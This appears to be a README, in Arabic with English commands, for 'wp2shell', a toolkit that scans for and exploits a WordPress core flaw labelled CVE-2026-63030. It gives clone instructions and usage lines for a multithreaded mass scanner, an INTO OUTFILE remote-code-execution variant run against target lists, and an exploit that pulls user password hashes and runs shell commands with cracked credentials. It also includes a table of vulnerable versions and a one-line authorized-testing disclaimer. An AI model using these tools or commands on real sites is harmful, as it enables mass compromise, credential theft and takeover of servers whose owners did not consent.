
wp2shell - أداة استغلال وماسح ضوئي لثغرة WordPress CVE-2026-63030
⚡ ماسح ومستغل ثغرات سريع وفوري لـ CVE-2026-63030 (wp2shell)
wp2shell عبارة عن مجموعة أدوات شاملة لاكتشاف واستغلال CVE-2026-63030، وهي ثغرة حرجة في WordPress تسمح للمهاجمين غير المصادق عليهم بتنفيذ تعليمات برمجية عن بُعد عبر ارتباك مسار الدُفعات في REST API مقترنًا بحقن SQL.
CVE-2026-63030 (wp2shell) هي ثغرة حرجة اكتشفها Adam Kues (Assetnote / Searchlight Cyber) وتؤثر على نواة WordPress. تجمع بين خطأين:
author__not_in# Clone repository
git clone https://github.com/Lutfifakee-Project/wp2shell.git
cd wp2shell
# No dependencies required - uses Python standard library only!
# Python 3.7+ required
ماسح فوري متعدد الخيوط لاكتشاف الثغرات على نطاق واسع.
# Basic scan
python wp2shell_scanner.py -f list.txt -o results.txt
# Skip SQLi test (faster)
python wp2shell_scanner.py -f list.txt -o results.txt --no-sqli-test
# JSON output
python wp2shell_scanner.py -f list.txt -j
يوضح متغير RCE الخاص بـ INTO OUTFILE (يتطلب صلاحية FILE في MySQL).
# Single target
python3 wp2shell_intooutfile.py https://target.com
# Multiple targets
python3 wp2shell_intooutfile.py -f list.txt -t 10
نسخة محمولة بملف واحد من الاستغلال مع وظائف كاملة.
# Check vulnerability
python wp2shell-exploit.py check https://target.com
# Read users (extract password hashes)
python wp2shell-exploit.py read https://target.com --preset users
# Read fingerprint
python wp2shell-exploit.py read https://target.com --preset fingerprint
# Execute command (after cracking hash)
python wp2shell-exploit.py shell https://target.com --user admin --password "cracked" --cmd "id"
مهم: هذه الأداة مخصصة للأغراض التعليمية والاختبار المصرح به فقط.
| نطاق الإصدار | التأثير | الحالة |
|---|
| 6.9.0 - 6.9.4 | 🔴 RCE (حرجة) | ❌ عرضة للخطر |
| 7.0.0 - 7.0.1 | 🔴 RCE (حرجة) | ❌ عرضة للخطر |
| 6.8.0 - 6.8.5 | 🟡 SQLi (عالية) | ❌ عرضة للخطر |
| 6.9.5+ / 7.0.2+ | ✅ تم التصحيح | ✅ آمن |